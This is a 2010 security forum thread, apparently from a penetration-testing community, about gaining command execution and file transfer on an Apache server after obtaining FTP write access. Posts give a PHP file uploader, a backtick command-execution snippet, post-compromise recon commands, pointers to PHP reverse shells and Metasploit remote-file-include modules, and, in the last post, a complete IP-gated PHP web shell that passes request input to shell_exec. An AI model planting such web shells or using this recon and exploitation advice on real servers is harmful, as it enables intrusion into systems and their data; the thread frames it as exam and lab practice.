.

PHP: Remote Code Execution and File Transfer

<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Mon Nov 08, 2010 11:23 am

PHP: Remote Code Execution and File Transfer

Hi,

Here is the scenario: You have write access through an FTP server to the htdocs directory of an Apache web server. The goal is to be able to execute commands and transfer files.

I have found some very basic PHP scripts:

UPLOADING FILES

HTML page:
  Code:
<form enctype="multipart/form-data" action="uploader.php" method="POST">
<input type="hidden" name="MAX_FILE_SIZE" value="100000" />
Choose a file to upload: <input name="uploadedfile" type="file" /><br />
<input type="submit" value="Upload File" />
</form>


PHP script:
  Code:
// Where the file is going to be placed
$target_path = "uploads/";

/* Add the original filename to our target path. 
Result is "uploads/filename.extension" */
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);



REMOTE CODE EXECUTION

  Code:
<?php
$output = `ls -al`;
echo "<pre>$output</pre>";
?>


Since these examples are very, very basics, I was wondering if you guys knew about good scripts to achieve similar tasks.

Thanks
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

apollo

Full Member
Full Member

Posts: 146

Joined: Fri Apr 04, 2008 7:44 pm

Post Mon Nov 08, 2010 12:24 pm

Re: PHP: Remote Code Execution and File Transfer

Check out http://sourceforge.net/projects/laudanum/ .  They have some things that will do what you want.  There are also some cleansed versions of what the evil folks out there are using.  They have some advanced functionality such as ability to escalate privileges, deal with databases, etc. 

Then, there's a fun one.  If you can turn it into a remote file injection, metasploit has a payload (exploit/unix/webapp/php_include) that will allow you to inject a php meterpreter.  It may be injectable on it's own, but you can then route traffic through that php file and do further enumeration, scanning, and ssh brute-force in order to get what you want.  And of course, you will have a shell, so you can do most of what you're looking for.

Hope this helps
CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Mon Nov 08, 2010 1:15 pm

Re: PHP: Remote Code Execution and File Transfer

Great!

I will look at them tonight and let you know what I was able to do.
Thanks Apollo!
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

sil

User avatar

Hero Member
Hero Member

Posts: 551

Joined: Thu Mar 20, 2008 8:01 am

Location: ::1

Post Mon Nov 08, 2010 2:00 pm

Re: PHP: Remote Code Execution and File Transfer

Alrighty now... Kungfunix time... You have write access but it is likely you are restricted because of the type of user/group on the server (e.g., apache:wheel) so your first goals would be to perform recon on the machine. If you can run the script you posted:

  Code:
<?php
$output = `ls -al`;
echo "<pre>$output</pre>";
?>


Then you should think about getting the following information to use for later tasks:

  Code:
more /etc/issue
- Find out EXACTLY what kind of server you're on
  Code:
pwd
- What directory are you in
  Code:
find /|grep -vi denied > available.output
(get rid of things you can't access (ignore denied))
  Code:
ifconfig |awk '/inet/{print $2}'|awk '{gsub (/addr:/ ,"")};{print}'|sort > ip.output
(sure I could have made this shorter, not the point ;) )

ME... What I like to do is look for configs from time to time, they yield a lot of information as do *_history files when available. I personally would try to get as much information as I could in order to launch a targeted attack with SPECIFICS for that system. For example, so what you can upload and run applications to the server, you will likely still need to escalate in order to truly accomplish anything.

By focusing on the information (uname -a/version, etc.) you gain a better view of what you're up against so you can upload a focused exploit which will save you time, headaches, etc. Anyhow, my point is... You has semi-root... Now what? If this is for the OSCP, OSCE, CPT, CEPT, chances are there is something exploitable left for you to find. Can you gather usernames, groups, anyone crisscross groups? Anything out of the ordinary permissions-wise?

Think like an administrator for a moment and then an attacker. "Why am I running this server, who needs to access it, what do I need to potentially HIDE from prying eyes..." This should include directories with obscure names, e.g. TMP, TEMP, .TEMP and so on. Don't forget the spaces ;) For example, on a term do a mkdir " " followed by an ls you'll see no directory. On the system itself with a window manager you will see a directory, but on terminal its blanked out so don't forget to search extensively.
<<

dante

User avatar

Jr. Member
Jr. Member

Posts: 58

Joined: Wed Jul 21, 2010 10:17 pm

Post Mon Nov 08, 2010 5:31 pm

Re: PHP: Remote Code Execution and File Transfer

There are plenty of reverse shell scripts written in php available online to achieve this task. I dont think you need a link to one  ;)
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Mon Nov 08, 2010 8:09 pm

Re: PHP: Remote Code Execution and File Transfer

You're right dante, for example, here is a link... ;D
http://pentestmonkey.net/tools/php-reverse-shell/

I really wanted to start a discussion on the subject and see what people were doing. I was hoping for something a bit more interesting, like the link apollo added and the comments sil provided.

But you are right, my first post wasn't too good...  :P
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

sil

User avatar

Hero Member
Hero Member

Posts: 551

Joined: Thu Mar 20, 2008 8:01 am

Location: ::1

Post Tue Nov 09, 2010 12:07 pm

Re: PHP: Remote Code Execution and File Transfer

Don't forget that metasploit has a module for this as well:

http://carnal0wnage.blogspot.com/2010/0 ... -file.html
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Tue Nov 09, 2010 1:00 pm

Re: PHP: Remote Code Execution and File Transfer

Wow, thanks great Sil!

Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.

Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like Simple Text-File Login Remote File Include that has a vulnerable string of:

/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]


I don't understand (and I can't test it right now...). What is the vulnerability being exploited? You need a "Remote File Include" vulnerability?
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

dante

User avatar

Jr. Member
Jr. Member

Posts: 58

Joined: Wed Jul 21, 2010 10:17 pm

Post Wed Nov 10, 2010 10:54 am

Re: PHP: Remote Code Execution and File Transfer

http://www.exploit-db.com/exploits/7444/

- This is the vulnerability being exploited.
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Wed Nov 10, 2010 11:04 am

Re: PHP: Remote Code Execution and File Transfer

From file 7444:
So it's like if the coder didn't think that a login system like this isn't vulnerable. Weird !


Like the author of this file, I have never seen this before. That's why I could understand it. Thanks Dante, I am good now.
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

Evil1

Newbie
Newbie

Posts: 7

Joined: Mon Aug 31, 2009 6:21 pm

Post Tue Dec 28, 2010 9:38 am

Re: PHP: Remote Code Execution and File Transfer

keep it simple and keep it secure. this lil 2 second write up executes commands and checks for the proper ip b4 executing them. Use 'wget' or 'fetch' to grab files remotely, and use uname -a to get system info. Just pass the commands to the text box like any other unix command. If shell_exec is disabled, try eval(), or system(), or the back ticks `` to execute commands.

If you attempt and RFI with this, just name it as a txt file and include it in the script you're exploiting.
  Code:
<html>
<form action="<?php echo $_SERVER['SCRIPT_NAME']?>" method="get">
Command 2 execute:<input type="text" name="cmd" />
<input type="submit" name="submit" value="do it" />
</form>
<?php
$ip = "your IP / proxy ip here";
if($_SERVER['REMOTE_ADDR'] != $ip)
{
echo "naw";
}
else
{
$cmd = $_REUQEST['cmd'];
echo "<pre>";
echo shell_exec($cmd);
echo "</pre>";
}
?>

Return to Programming

Who is online

Users browsing this forum: No registered users and 0 guests

cron
.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software